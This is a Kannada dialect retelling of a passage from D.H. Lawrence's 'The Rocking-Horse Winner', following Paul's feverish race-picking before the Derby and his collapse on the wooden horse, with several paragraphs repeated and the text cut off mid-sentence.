‘ನಿಮ್ಮ ಅವ್ವ ಹೆಂಗದ್ರ ಕನ್ನಡಿ ಒಳಗಿರೋ ಗಂಟು ಕಾಯ್ಕೋತಾ ಯಾರು ಕುಂಡರತಾರು? ಎಲ್ಲ್ಯೋ ಇರೋ ಗಂಟಿಗಿಂತ ಕೈಯಲ್ಲಿರೋ ದಂಟೇ ಲೇಸು ಅಂತ ಇದ್ದದ್ದನ್ನು ಅಷ್ಟೂ ಬಾಚಿಕೊಂಡು ಹೋಗಲಿಕ್ಕೆ ತಯಾರ್ಯಾಗಾಳ..’ ತಾಯಿಯ ತಮ್ಮ ಹೀಗೆ ನಕ್ಕದ್ದನ್ನು ಕಂಡು ಪಾಲ್‍ನಿಗೆ ಕಸಿವಿಸಿಯಾಯಿತು. ಅವ್ವನಿಗೆ ಅದು ಅವಮಾನವಲ್ಲವೆ? ಪಾಪ! ತಾಯಿ ಎಷ್ಟೊಂದು ಹಣದ ಮುಗ್ಗಟ್ಟಿನಲ್ಲಿದ್ದಾಳೆ.

ಸೋಫಾ ಕವರ್‍ಗಳು ಮನೆಗೆ ಇದುವರೆಗೂ ಇರದಿದ್ದ ಹೊಸ ಸೌಂದರ್ಯ ಮತ್ತು ಚೆಲುವಿಕೆಯನ್ನು ಕೊಡಲು ಹವಣಿಸತೊಡಗಿದವು. ಇನ್ನಾರು ತಿಂಗಳಲ್ಲಿ ಪಾಲ್ ಒಂದು ಪ್ರಸಿದ್ಧ ಶಾಲೆಯನ್ನು ಸೇರಲಿರುವುದರಿಂದ ಆತನಿಗೆ ಒಬ್ಬ ಟ್ಯೂಷನ್ ಮಾಸ್ತರರನ್ನು ಕೂಡ ತಾಯಿ ನೇಮಿಸಿದಳು. ಎಲ್ಲರೂ ಇಷ್ಟಪಡುವಂತಹ ಸುಖ ಸಾಧನಗಳು, ವಿಲಾಸಿ ವಸ್ತುಗಳು ಮನೆಗೆ ಬಂದವು.

ಆಸ್ಕರ್ ಮಾಂವ ಸಹಿ ಮಾಡಿದ ನಂತರ ಪಾಲ್‍ನ ಅಮ್ಮ ಆ ಐದೂ ಸಾವಿರ ಪೌಂಡುಗಳನ್ನು ಎಣಿಸಿಕೊಂಡು ಹೋದಳು. ಮನೆ ಈಗ ಹೊಸ ಅಲಂಕಾರದಿಂದ ಕಂಗೊಳಿಸಹತ್ತಿತು. ಹೊಸ ಬೆಡ್‍ಶೀಟ್‍ಗಳು, ಬಾಗಿಲ ಪರದೆಗಳು, ಸೋಫಾ ಕವರ್‍ಗಳು ಮನೆಗೆ ಇದುವರೆಗೂ ಇರದಿದ್ದ ಹೊಸ ಸೌಂದರ್ಯ ಮತ್ತು ಚೆಲುವಿಕೆಯನ್ನು ಕೊಡಲು ಹವಣಿಸತೊಡಗಿದವು. ಇನ್ನಾರು ತಿಂಗಳಲ್ಲಿ ಪಾಲ್ ಒಂದು ಪ್ರಸಿದ್ಧ ಶಾಲೆಯನ್ನು ಸೇರಲಿರುವುದರಿಂದ ಆತನಿಗೆ ಒಬ್ಬ ಟ್ಯೂಷನ್ ಮಾಸ್ತರರನ್ನು ಕೂಡ ತಾಯಿ ನೇಮಿಸಿದಳು. ಎಲ್ಲರೂ ಇಷ್ಟಪಡುವಂತಹ ಸುಖ ಸಾಧನಗಳು, ವಿಲಾಸಿ ವಸ್ತುಗಳು ಮನೆಗೆ ಬಂದವು.

ಮನೆಯಲ್ಲಿ ಇಷ್ಟೆಲ್ಲ ಹೊಸ ಬೆಳವಣಿಗೆಗಳು ನಡೆದರೂ, ನವನವೀನ ವಸ್ತುಗಳು ಬಂದು ಮನೆಯೆಂಬುದು ಅರಮನೆಯಂತೆ ಕಂಗೊಳಿಸತೊಡಗಿದರೂ ‘ದುಡ್ಡು ದುಡ್ಡು’ ಎನ್ನುವ ಮನೆಯ ಪರಪರ ದನಿ ಎಂದಿಗಿಂತ ಹೆಚ್ಚಾಗಿತ್ತು. ಹಾಸಿಗೆಯಲ್ಲಿ ಮಲಗಿದರೆ, ಪಡಸಾಲೆಯಲ್ಲಿ ನಿಂತರೆ, ಸೋಫಾದಲ್ಲಿ ಕುಂತರೆ, ಊಟಕ್ಕೆಂದು ತಾಟು ಹಿಡಿದರೆ ಬರೀ ಅದೇ ದನಿ, ಅದೇ ಚೀತ್ಕಾರ. ಮಳೆಗಾಲದಲ್ಲಿ ಕಪ್ಪೆಗಳು ವಟರ್ ವಟರ್ ಎಂದು ಒದರಿದಂತೆ ‘ಮನೆಗೆ ದುಡ್ಡು ಬೇಕಾಗಿದೆ …ದುಡ್ಡು’ ಎನ್ನುವ ಕರ್ಣಭೇದಕ ದನಿ ಕೇಳಿಬರುತ್ತಿತ್ತು. ಇದರಿಂದ ಪಾಲ್‍ನಿಗೆ ಹುಚ್ಚು ಹಿಡಿಯುವುದೊಂದೇ ಬಾಕಿ. ಹೊಸ ಟ್ಯೂಶನ್ ಮಾಸ್ತರ್‍ನ ಹತ್ತಿರ ಆತ ಲ್ಯಾಟಿನ್ ಮತ್ತು ಗ್ರೀಕ್ ಭಾಷೆಗಳನ್ನು ಕಲಿಯತೊಡಗಿದ್ದ. ಆದರೆ ಅವನಿಗೆ ಅದಕ್ಕಿಂತ ಕಠಿಣವೆನಿಸಿದ್ದೆಂದರೆ ಬ್ಯಾಸೆಟ್‍ನ ಹತ್ತಿರ ಕುಳಿತು ಮುಂದಿನ ಸಲ ಯಾವ ಕುದುರೆ ಗೆಲ್ಲುವುದೆಂದು ಲೆಕ್ಕ ಹಾಕುವುದು. ತಾಯಿಯನ್ನು ಸಂತೃಪ್ತಗೊಳಿಸಬೇಕಾದರೆ ತಾನು ರೇಸ್‍ನಲ್ಲಿ ಗೆಲ್ಲಲೇಬೇಕು. ಅವನ ಉದ್ವೇಗ ಹೆಚ್ಚಿದಂತೆಲ್ಲ ಗೆಲ್ಲುವ ಕುದುರೆ ಯಾವುದೆಂದು ನಿಖರವಾಗಿ ಹೇಳುವುದು ಕಷ್ಟವಾಗುತ್ತಿದೆ.

ಮುಂದಿನ ಕುದುರೆ ಯಾವುದೆಂದು ಅವನು ತೀರ್ಮಾನಿಸಬೇಕಾಗಿತ್ತು! ಡರ್ಬಿ ಎಂಬ ಹೆಸರಿನ ರೇಸ್ ಸದ್ಯದಲ್ಲಿಯೇ ಇದೆ. ಅದರಲ್ಲಿಯಾದರೂ ಗೆಲ್ಲಬಹುದು. ತನ್ನ ಅದೃಷ್ಟ ಈಗಲಾದರೂ ಖುಲಾಯಿಸಬಹುದು.

ಇತ್ತೀಚೆಗೆ ಗೆಲ್ಲುವ ಕುದುರೆ ಯಾವುದೆಂದು ಪತ್ತೆ ಹಚ್ಚಲಾಗದೆ ‘ಗ್ರ್ಯಾಂಡ್ ನ್ಯಾಶನಲ್’ ಮತ್ತು ‘ಲಿಂಕನ್’ ಎನ್ನುವ ಎರಡೂ ರೇಸ್‍ಗಳಲ್ಲಿ ಅವರು ಸೋತಿದ್ದರು. ಇದರಿಂದ ಅವನ ಕಣ್ಣುಗಳಲ್ಲಿಯ ಕಿಚ್ಚು ಹೆಚ್ಚಾಗಿತ್ತು. ನಿದ್ದೆಯಿಲ್ಲದೆ ಜಯಿಸುವುದು ಹೇಗೆಂದು ಸದಾ ಚಿಂತಿಸುತ್ತಿದ್ದುದರಿಂದ ಕಣ್ಣುಗಳಲ್ಲಿ ಉರಿಯೇ ತುಂಬಿಕೊಂಡಿತ್ತು. ಯೋಚಿಸಿ, ಯೋಚಿಸಿ ತಾನು ಸ್ಪೋಟಗೊಳ್ಳುವೆನೇನೋ ಎಂದು ಆತ ಹೆದರತೊಡಗಿದ. ಮಾವ ಧೈರ್ಯ ಕೊಟ್ಟ: ‘ಹೋಗಲಿ ಬಿಡೋ ಪಾಲ್.. ಒಂದೆರಡು ಸಲ ಸೋತರೆ ಏನಾಗ್ತದ? ಯಾಕ್ ಹೆದರತಿ? ಮುಂದ ನೋಡೋಣು..’ ಆದರೆ ಮಾವನ ಮಾತಿನತ್ತ ಅವನ ಲಕ್ಷ್ಯವಿರಲಿಲ್ಲ. ಮುಂದಿನ ಕುದುರೆ ಯಾವುದೆಂದು ಅವನು ತೀರ್ಮಾನಿಸಬೇಕಾಗಿತ್ತು! ಡರ್ಬಿ ಎಂಬ ಹೆಸರಿನ ರೇಸ್ ಸದ್ಯದಲ್ಲಿಯೇ ಇದೆ. ಅದರಲ್ಲಿಯಾದರೂ ಗೆಲ್ಲಬಹುದು. ತನ್ನ ಅದೃಷ್ಟ ಈಗಲಾದರೂ ಖುಲಾಯಿಸಬಹುದು.

ಅವನಲ್ಲಿ ತೀವ್ರತರವಾದ ಬದಲಾವಣೆ, ಅನಾರೋಗ್ಯ, ಏನೋ ಉದ್ವೇಗಗಳನ್ನು ಕಂಡು ತಾಯಿ ಮಗನಿಗೆ ಅಂದಳು: ‘ಏಯ್ ಪಾಲ್, ಒಂದಷ್ಟು ದಿನ ಎಲ್ಲಿಯಾದರೂ ಹೋಗಿ ಸ್ವಲ್ಪ ವಿಶ್ರಾಂತಿ ತಗೊಂಡು ಬಾ. ಸಮುದ್ರ ದಂಡಿಗೆ ಹೋಗ್ತಿಯೇನು? ಅಲ್ಲಿಗೆ ಹೋಗಲಿಕ್ಕೆ ವ್ಯವಸ್ಥೆ ಮಾಡಲೇನು?’ ತುಂಬ ಸೊರಗಿದಂತೆ ಕಂಡ ಮಗನನ್ನು ಕಂಡು ಅವಳು ಮೊದಲ ಬಾರಿ ಮಮ್ಮಲ ಮರುಗಿದಳು. ಹೃದಯ ಭಾರವಾಯಿತು. ಮದುವೆಯಾದ ಮೇಲೆ ಹೃದಯ ಭಾರವಾಗುವುದು ಎಂದರೇನೆಂದೆ ಅವಳಿಗೆ ಮರೆತುಹೋಗಿತ್ತು. ಪ್ರಪಥಮ ಬಾರಿಗೆ ಮಗನಿಗಾಗಿ ಅವಳ ಹೃದಯ ಮಿಡಿಯಿತು. ಆದರೆ ಹೊರಗೆ ಹೋಗಲು ಮಗ ನಿರಾಕರಿಸಿದ.

‘ಡರ್ಬಿ ರೇಸ್ ಮುಗಿಯೋತನಕ ನಾ ಎಲ್ಲಿಯೂ ಹೋಗಂಗಿಲ್ಲ..’

“ಹಂಗ್ಯಾಕ ಹೇಳ್ತಿಯೋ, ನೀನು ಸಮುದ್ರದ ಕಡೆ ಹೋಗಿ ಒಂದೆರಡು ದಿನ ಅಡ್ಡಾಡಿ ಬಾ. ಅಲ್ಲಿಗೆ ಹೋಗಿ ಬಂದ ಮ್ಯಾಲ ಡರ್ಬಿ ನೋಡಲಿಕ್ಕೆ ಹೋಗುವಂತೆ. ಏಯ್ ಪಾಲ್, ಕೇಳಿಲ್ಲಿ. ನನಗ ಇತ್ತೀಚೆಗೆ ಏನು ಅನಿಸಲಿಕ್ಕೆ ಸುರು ಆಗೇತಿ ಅಂದ್ರ ನೀನು ಈ ಕುದುರೆ ರೇಸಿನ ಬಗ್ಗೆ ಬಾಳ ತಲೆ ಕೆಡಿಸಿಕೊಂಡಿ. ಅದು ನಿನ್ನ ಮಕದಾಗ ಕಾಣ್ತದ. ಅದು ನಿನ್ನ ಆರೋಗ್ಯಕ್ಕ ಚೂರೂ ಒಳ್ಳೇದಲ್ಲ. ಏಯ್ ಪಾಲ್, ಬಾರೋ ಇಲ್ಲಿ ನನ್ನ ಹತ್ತಿರ ಬಾರೋ, ಮತ್ತ ನನಗ ಏನು ಅನಿಸಲಿಕ್ಕೆ ಹತ್ತೇದ ಅಂದ್ರ ನಮ್ಮ ಇಡೀ ಕುಟುಂಬ ಒಂದು ಜೂಜುವಂತರ ಕುಟುಂಬ ಆಗೇದ ಅಂತ. ಅದಕ್ಕ ಬಾಳ ಚಿಂತಿ ಸುರುವಾಗೇದ. ಈ ಜೂಜು ನಮಗ ಬಾಳ ಪೆಟ್ಟು ಕೊಟ್ಟದ. ಖರೇನ ಬಾಳ ದೊಡ್ಡ ಪೆಟ್ಟು. ನೀ ದೊಡ್ಡಾಂವ ಆದಾಗ ನಿನಗ ಗೊತ್ತಾಗ್ತದ, ಅದು ಎಷ್ಟು ದೊಡ್ಡ ಪೆಟ್ಟು ಅಂತ. ನೀ ಹೀಂಗ ಪದೇಪದೇ ರೇಸಿನ ಬೆನ್ನಿಗೆ ಬಿದ್ದಿಯಂದ್ರ ನಮ್ಮ ತ್ವಾಟದಾಗ ಕೆಲಸ ಮಾಡೋ ಮಾಲಿ ಅದಾನಲ್ಲ ಅಂವನ್ನ ನೌಕರಿಯಿಂದ ಬಿಡಿಸಿಬಿಡ್ತೇನಿ. ಅಂವನೇ ನಿನ್ನ ಹಾಳ ಮಾಡಿದಾಂವ ಕಾಣ್ತಾನ. ನಿಮ್ಮ ಮಾಂವಗೂ ಮನಿಗೆ ಬರಬ್ಯಾಡ ಅಂತ ಹೇಳಬೇಕಾಗೇದ. ಅಂವನೂ ಇದರಾಗ ಶಾಮೀಲಾಗ್ಯಾನ. ಹೌದಲ್ಲೋ? ಹೋಗು, ಎರಡು ದಿನ ಹೊರಗ ಹೋಗಿ ಆರೋಗ್ಯ ಸುಧಾರಿಸಿಕೊಂಡು ಬಾ.. ತಿಳಿತೇನು?” 

‘ಅವ್ವ, ಆ ಡರ್ಬಿ ರೇಸ್ ಆಗೋತನಕ ತಡಿ. ಆಮ್ಯಾಲ ನೀ ಹೇಳಿದಂಗ ಕೇಳ್ತೇನಿ, ಆದರ ಈ ಮನಿಯಿಂದ ಹೊರಗ ಮಾತ್ರ ಕಳಿಸಬ್ಯಾಡ. ಈ ಮನಿ ಬಿಟ್ಟು ದೂರ ಹೋಗೋದು ಅಂದ್ರ ನನ್ನ ಜೀವ ಹ್ವಾದಂಗ ಅನಿಸ್ತದ…’

“ಈ ಮನೀನ ನೀನು ಇಷ್ಟು ಹಚ್ಚಗೊಂಡಿ ಅಂತ ನಾ ತಿಳಕೊಂಡಿರಲಿಲ್ಲ. ಅಂತಹ ವಿಶೇಷ ಏನೈತಿ ಈ ಮನ್ಯಾಗ.”

ಆ ರಹಸ್ಯವನ್ನು ಆತ ಇದುವರೆಗೂ ಯಾರಿಗೂ ಹೇಳಿಲ್ಲ. ತಾಯಿಯನ್ನು ನೋಡಿ ಸುಮ್ಮನಾದ. ಈ ಹುಡುಗನಿಗೆ ಏನೂ ಹೇಳಬೇಕೆಂದು ತಿಳಿಯದೆ ಆಕೆ “ಆತು, ಡರ್ಬಿ ಮುಗಿದ ಮ್ಯಾಲ ಪ್ರವಾಸಕ್ಕ ಹೋಗುವಂತೆ. ಆದರ ಸುಮ್ಮನ ಆ ಜೂಜಿನ ಬಗ್ಗೆ ತಲಿ ಕೆಡಿಸಿಕೊಳ್ಳಬ್ಯಾಡ. ಆರಾಮದಿಂದ ಇರು.. ತಿಳಿತಿಲ್ಲೊ?”

‘ಆಯ್ತವ್ವ, ನಾ ಆರಾಮ ಇರ್ತೇನಿ, ನೀನು ಸುಮ್ಮನ ಯಾವುದ್ಯಾವುದಕ್ಕೋ ಚಿಂತಿ ಮಾಡಲಿಕ್ಕೆ ಹೋಗಬ್ಯಾಡ. ನೀ ಚೆಂದ ಇದ್ರ ನನಗೂ ಖುಶಿ ಅನಸ್ತದ. ನಾನು ನೀನಾಗಿದ್ರ…’ ಪಾಲ್ ಹೇಳಿ ನಿಂತ. ಮಗನ ಮಾತು ಅವಳಿಗೆ ವಿಚಿತ್ರವೆನಿಸಿತು.

“ನಾ ನೀನಾಗಿದ್ರ, ನೀ ನಾನಾಗಿದ್ರ ಯಾರಿಗ್ಗೊತ್ತು ಏನಾಗ್ತಿತ್ತು?”

‘ಅಮ್ಮ, ನೀ ಖುಶಿಯಿಂದ ಇರಬೇಕು. ಯಾವ ಚಿಂತಿನೂ ಇರಬಾರದು..’

“ನೀ ಈ ತರಹ ಮಾತಾಡೋದು ನೋಡಿ ಖರೇನ ನನಗ ಬಾಳ ಖುಶಿ ಅನಸ್ತದ. ಆತು, ನೀನೂ ಕಾಳಜಿ ತಗೋ.”

ಪಾಲ್‍ನ ದೊಡ್ಡ ರಹಸ್ಯವೆಂದರೆ ಅವನ ಮರದ ಕುದುರೆ! ಹುಡುಗರೆಲ್ಲ ದೊಡ್ಡವರಾಗಿದ್ದರೆಂದು ಇತ್ತೀಚೆಗೆ ನರ್ಸ್‍ಳನ್ನು ಬಿಡಿಸಲಾಗಿತ್ತು. ಆಟದ ಕೋಣೆಯೊಳಗಿದ್ದ ಕುದುರೆಯನ್ನು ಆತ ಇತ್ತೀಚೆಗೆ ತನ್ನ ಮಲಗುವ ರೂಮಿಗೆ ತೆಗೆದುಕೊಂಡು ಹೋಗಿದ್ದ. ‘ಅಲ್ಲೋ ಪಾಲ್, ಎಷ್ಟು ಸಲ ಹೇಳಬೇಕು ನಿನಗ? ಇಷ್ಟು ದೊಡ್ಡಾಂವ ಆಗಿ ಆ ಮರಗುದುರಿ ಜೋಡಿ ಆಟ ಆಡ್ತೀಯಲ್ಲ?’

“ಇನ್ನೊಂದು ಸ್ವಲ್ಪ ದಿವಸ ಅವ್ವ, ನಾ ಜೀವಂತ ಕುದುರಿ ಹತ್ತೋತನ ಈ ಕುದುರಿ ಮ್ಯಾಲ ಕುಂಡ್ರತೇನಿ. ಆಡಲಿಕ್ಕೆ ನನಗ ಯಾವುದಾದರೂ ವಸ್ತು ಬೇಕಲ್ಲ ಮತ್ತ?” ಅವನ ಬೆಡ್‍ರೂಮಿಗೆ ಹೋಗುವಾಗ ಆ ಮರಗುದುರೆ ಓಡುತ್ತಲೆ ಹೋದಂತೆ ಅವನಿಗೆ ಅನಿಸಿತ್ತು.

ಡರ್ಬಿ ಪಂದ್ಯ ಹತ್ತಿರ ಬಂದಂತೆ ಪಾಲ್‍ನ ಮುಖ ಸೆಟೆದುಕೊಳ್ಳತೊಡಗಿತು. ಯಾರು ಏನು ಹೇಳಿದರೂ ಅದು ಅವನಿಗೆ ಕೇಳುತ್ತಿರಲಿಲ್ಲ. ಅವನ ಲೋಕದಲ್ಲೇ ಅವನಿದ್ದ. ಅವನು ತುಂಬ ಸೊರಗಿದಂತೆ ಕಾಣತೊಡಗಿದ. ಆತನ ಕಣ್ಣುಗಳೋ ಕೆಂಡದುಂಡೆಗಳಾದವು. ಅವನ ತಾಯಿಗೆ ಅವನ ಬಗ್ಗೆ ಕರುಣೆಯುಂಟಾಗತೊಡಗಿತು. ಪ್ರತಿ ತಾಸಿಗೊಮ್ಮೆ ಮಗ ಹೇಗೆ ಇದ್ದಾನೋ ಎಂದು ಕಳವಳಗೊಂಡು ಆತನ ಆಟದ ಸಪ್ಪಳ ಕೇಳಿ ಸುಮ್ಮನಾಗುವಳು. ಡರ್ಬಿ ರೇಸ್ ಸುರುವಾಗುವ ಎರಡು ದಿನ ಮೊದಲು ಆಕೆ ಶಹರದ ಸ್ನೇಹಿತರೊಬ್ಬರ ಪಾರ್ಟಿಯಲ್ಲಿ ಪಾಲ್ಗೊಂಡಿದ್ದಳು. ಪಾರ್ಟಿ ನಡೆದ ಹೊತ್ತಿನಲ್ಲಿ ಯಾಕೋ ಅವಳಿಗೆ ಮಗನ ನೆನಪಾಯಿತು. ಅವಳ ಹೃದಯವನ್ನು ಯಾರೋ ಗುದ್ದಿದಂತಾಗುತ್ತಿತ್ತು. ಏನೋ ಅನಿಸಿದಂತಾಗಿ ಮನೆಗೆ ಫೋನ್ ಮಾಡಿದಳು.

ಒಂದರ ಹಿಂದೆ ಮತ್ತೊಂದು ಪ್ರಶ್ನೆ ತೇಲಿಬಂದವು. ಕೆಲಸದವಳು ‘ಎಲ್ಲರೂ ಆರಾಮ ಅದಾರ.. ಎಲ್ಲಾರೂ ಇದೇ ಈಗ ಮಲಗ್ಯಾರ..ಪಾಲ್ ಮ್ಯಾಲಿನ ತನ್ನ ಕ್ವಾಣಿಯೊಳಗ ಮಲಕ್ಕೊಂಡಾನ.. ಯಾಕ ಪಾಲ್‍ಗ ಏನಾದರೂ ಹೇಳಬೇಕಿತ್ತೇನು?

ರಾತ್ರಿ ಫೋನ್ ಬಂದಿದ್ದಕ್ಕೆ ಕೆಲಸದಾಕೆ ಹೆದರಿಕೊಂಡಳು. ‘ಎಲ್ಲ ಮಕ್ಕಳು ಆರಾಮ ಅದಾರಲ್ಲ?’, ‘ಪಾಲ್ ಏನ್ ಮಾಡ್ಲಿಕ್ಕೆ ಹತ್ತ್ಯಾನ’, ‘ಆರಾಮ ಅದಾನಿಲ್ಲೋ’, ‘ಊಟ ಮಾಡಿದ್ನಾ?’- ಒಂದರ ಹಿಂದೆ ಮತ್ತೊಂದು ಪ್ರಶ್ನೆ ತೇಲಿಬಂದವು. ಕೆಲಸದವಳು ‘ಎಲ್ಲರೂ ಆರಾಮ ಅದಾರ.. ಎಲ್ಲಾರೂ ಇದೇ ಈಗ ಮಲಗ್ಯಾರ..ಪಾಲ್ ಮ್ಯಾಲಿನ ತನ್ನ ಕ್ವಾಣಿಯೊಳಗ ಮಲಕ್ಕೊಂಡಾನ.. ಯಾಕ ಪಾಲ್‍ಗ ಏನಾದರೂ ಹೇಳಬೇಕಿತ್ತೇನು? ಅಂವನ ರೂಮಿಗೆ ಹೋಗಿ ನೋಡಲೇನು ಅಮ್ಮಾವ್ರೆ..’ ಕೆಲಸದಾಳು ಕೇಳಿದಳು. ‘ಬ್ಯಾಡ. ನಾ ಬೇಗ ಬರ್ತೀನಿ, ಬಿಡು.. ನಾ ಬಂದ ಮ್ಯಾಲ ವಿಚಾರ ಮಾಡ್ತೀನಿ..’

ಗಂಡ-ಹೆಂಡತಿ ಮನೆಗೆ ಬಂದಾಗ ರಾತ್ರಿ ಒಂದು ಗಂಟೆಯಾಗಿತ್ತು. ಬಟ್ಟೆ ಬದಲಿ ಮಾಡಿದ ನಂತರ ಅವಳು ಅಟ್ಟ ಹತ್ತಿ ಮಗನ ಕೋಣೆಗೆ ಹೋದಳು. ಅವಳು ಮೆಟ್ಟಿಲು ಹತ್ತುವಾಗಲೇ ಏನೋ ಸದ್ದು ಕೇಳಿದಂತಾಗುತ್ತಿತ್ತು. ಯಾಕೆ ಮಗ ಇನ್ನೂ ಮಲಗಿಲ್ಲವೆ? ಅವಳು ಸದ್ದು ಮಾಡದೆ ಹತ್ತಿದಳು. ಬಾಗಿಲಿಗೆ ಕಿವಿಗೊಟ್ಟು ಆಲಿಸಿದಳು. ಆ ಶಬ್ದವನ್ನು ಅವಳು ಕೇಳಿದಂತೆ ಅನಿಸಿದರೂ ಏನೆಂದು ತಿಳಿಯಲಾರದು. ಅದು ಅಷ್ಟೊಂದು ಶಕ್ತಿಶಾಲಿ. ಅಷ್ಟೊಂದು ಉನ್ಮಾದ. ಹುಚ್ಚು ಹುಚ್ಚಾದ ಧ್ವನಿ. ಅವಳಿಗೆ ಪರಿಚಿತ ದನಿ, ಆದರೂ ಅವಳು ಅದರ ಗುರುತು ಹಿಡಿಯಲೊಲ್ಲಳು. ತಡೆದುಕೊಳ್ಳಲಾಗದೆ ಕೋಣೆಯ ಬಾಗಿಲನ್ನು ತಳ್ಳಿದಳು. ಎಲ್ಲೆಲ್ಲೂ ಕತ್ತಲು. ಕಿಟಕಿಯ ಮಬ್ಬು ಬೆಳಕಿನಲ್ಲಿ ಹಿಂದೆ-ಮುಂದೆ ಹೋಗುತ್ತಿರುವ ಆಕೃತಿಯೊಂದನ್ನು ಕಂಡು ಅವಳು ಭಯಭೀತಳಾಗಿ ನಿಂತಳು. ಕೋಣೆಯಲ್ಲಿ ದೀಪ ಹಾಕಿಲ್ಲವೆಂದು ಅರಿವಿಗೆ ಬಂದು ಲೈಟ್ ಹಚ್ಚಿದಳು. ಮಗ ಮರಗುದುರೆ ಸವಾರಿ ಮಾಡುತ್ತ ಹೂಂಕರಿಸುತ್ತಿದ್ದಾನೆ.

ಹುಡುಗ ಪ್ರಜ್ಞಾಹೀನನಾಗಿದ್ದ. ಡಾಕ್ಟರರು ಮಿದುಳು ಜ್ವರವೆಂದು ಹೇಳಿದರು. ಆತ ನಡುನಡುವೆ ಎಚ್ಚರಾಗಿ ಕೂಗುತ್ತಿದ್ದ: “ಏ, ಬ್ಯಾಸೆಟ್, ನನ್ನ ಮಾತು ಕೇಳು, ಈ ಸಲ ಮಲಬಾರ್, ಈ ಸಲ ತಪ್ಪಲಿಕ್ಕೆ ಸಾಧ್ಯವೇ ಇಲ್ಲ. ಮಲಬಾರ್..”

“ಏಯ್ ಹುಚ್ಚ ಮಗನೆ, ಏನ್ ಮಾಡಲಿಕ್ಕೆ ಹತ್ತಿದೀಯೋ?” ಸಿಟ್ಟಿನಲ್ಲಿ ತಾಯಿ ಚೀರಿದಳು.

‘ಈ ಸಲ ಮಲಬಾರ್, ಈ ಸಲ ಗೆಲ್ಲೋದು ಮಲಬಾರ್ ಕುದುರೆ..’ ಅವನು ವಿಚಿತ್ರ ಧ್ವನಿಯಲ್ಲಿ ಕೂಗುತ್ತ ಕುದುರೆಯ ಮೇಲಿಂದ ದೊಪ್ಪನೆ ನೆಲಕ್ಕೆ ಬಿದ್ದ. ಅವಳ ತಾಯ್ತನದ ಕರುಳು ಕಿವುಚಿದಂತಾಗಿ ಮುದ್ದೆಯಾಗಿ ಬಿದ್ದಿದ್ದ ಮಗನನ್ನು ಮಡಿಲಲ್ಲಿ ಎತ್ತಿಕೊಂಡಳು. ಹುಡುಗ ಪ್ರಜ್ಞಾಹೀನನಾಗಿದ್ದ. ಡಾಕ್ಟರರು ಮಿದುಳು ಜ್ವರವೆಂದು ಹೇಳಿದರು. ಆತ ನಡುನಡುವೆ ಎಚ್ಚರಾಗಿ ಕೂಗುತ್ತಿದ್ದ: “ಏ, ಬ್ಯಾಸೆಟ್, ನನ್ನ ಮಾತು ಕೇಳು, ಈ ಸಲ ಮಲಬಾರ್, ಈ ಸಲ ತಪ್ಪಲಿಕ್ಕೆ ಸಾಧ್ಯವೇ ಇಲ್ಲ. ಮಲಬಾರ್..”

ಆತ ಏನು ಬಡಬಡಿಸುತ್ತಿದ್ದಾನೆಂದು ಅವ್ವನಿಗೆ ತಿಳಿಯಲಿಲ್ಲ. ಅಪ್ಪನೂ ಗೊತ್ತಿಲ್ಲವೆಂದು ಗೋಣು ಹಾಕಿದ. ಅವಳ ತಮ್ಮ ಆಸ್ಕರ್ ಬಂದ: ‘ಅದೊಂದು ಕುದುರೆಯ ಹೆಸರು. ಡರ್ಬಿ ರೇಸಿನ ಸ್ಪರ್ಧೆಯಲ್ಲಿರುವ ಕುದುರೆಗಳಲ್ಲಿ ಅದೂ ಒಂದು.’

ಪಾಲ್ ಇಂತಹ ಗಂಭೀರ ಸ್ಥಿತಿಯಲ್ಲಿರುವಾಗ ಜೂಜು ಆಡಲು ಮಾವನಿಗೆ ಮನಸ್ಸಿರಲಿಲ್ಲ. ಆದರೂ ಒಳಗಿನ ಆಸೆಯನ್ನು ತಡೆಯಲಾಗಲಿಲ್ಲ. ಅವನಿಗೆ ಮನಸ್ಸಿರದಿದ್ದರೂ ಆತ ಬ್ಯಾಸೆಟ್‍ನಿಗೆ ಫೋನ್ ಮಾಡಿದ. ತನ್ನ ಹೆಸರಿಗೆ ಪ್ರಥಮ ಬಾರಿಗೆ ಸಾವಿರ ಪೌಂಡ್‍ಗಳ ಬಾಜಿ ಕಟ್ಟಿದ.

ಅವನಿಗೆ ಪೂರ್ಣವಾಗಿ ನಿದ್ದೆಯೂ ಬರುತ್ತಿಲ್ಲ, ಪ್ರಜ್ಞೆಗೂ ಆತ ಜಾರುತ್ತಿಲ್ಲ. ಅವನ ಕಣ್ಣುಗಳು ಮಾತ್ರ ಹೊಳೆಯುತ್ತಿರುವ ನೀಲಿ ಹರಳುಗಳಾಗಿ ಗೋಚರಿಸುತ್ತಿವೆ. ತನ್ನ ಎದೆಯ ಮೇಲೆ ಯಾರೋ ದೊಡ್ಡ ಬಂಡೆಗಲ್ಲನ್ನು ಇಟ್ಟವರಂತೆ ತಾಯಿ ಸುಮ್ಮನೆ ಕೂತಿದ್ದಳು.

ಮೂರನೆಯ ದಿನಕ್ಕೆ ಪಾಲ್‍ನ ಸ್ಥಿತಿ ಮತ್ತಷ್ಟು ಬಿಗಡಾಯಿಸಿತ್ತು. ಏನಾದರೂ ಸುಧಾರಿಸೀತು, ದೇವರ ಕರುಣೆ ತಮ್ಮ ಮಗನನ್ನು ಉಳಿಸೀತು ಎಂದು ಆಶಾಭಾವನೆ ಹೊಂದಿದ್ದರು. ಇಷ್ಟು ಒಳ್ಳೆಯ ಮಗನನ್ನು ಆತ ಹೇಗೆ ಕಿತ್ತುಕೊಂಡಾನು ಎಂದು ಅಪ್ಪ-ಅವ್ವ ಅವನ ಮುದ್ದಾದ ಮುಖವನ್ನು ಎವೆಯಿಕ್ಕದೆ ನೋಡುತ್ತಿದ್ದರು. ತಲೆದಿಂಬಿನ ಆಚೆ-ಈಚೆ ಆತ ತಲೆ ಹೊರಳಿಸುವಾಗ ಅವನ ಉದ್ದ ಗುಂಗುರಗೂದಲು ಆ ಕಡೆ ಈ ಕಡೆ ಹೊಯ್ದಾಡುತ್ತಿತ್ತು. ಅವನಿಗೆ ಪೂರ್ಣವಾಗಿ ನಿದ್ದೆಯೂ ಬರುತ್ತಿಲ್ಲ, ಪ್ರಜ್ಞೆಗೂ ಆತ ಜಾರುತ್ತಿಲ್ಲ. ಅವನ ಕಣ್ಣುಗಳು ಮಾತ್ರ ಹೊಳೆಯುತ್ತಿರುವ ನೀಲಿ ಹರಳುಗಳಾಗಿ ಗೋಚರಿಸುತ್ತಿವೆ. ತನ್ನ ಎದೆಯ ಮೇಲೆ ಯಾರೋ ದೊಡ್ಡ ಬಂಡೆಗಲ್ಲನ್ನು ಇಟ್ಟವರಂತೆ ತಾಯಿ 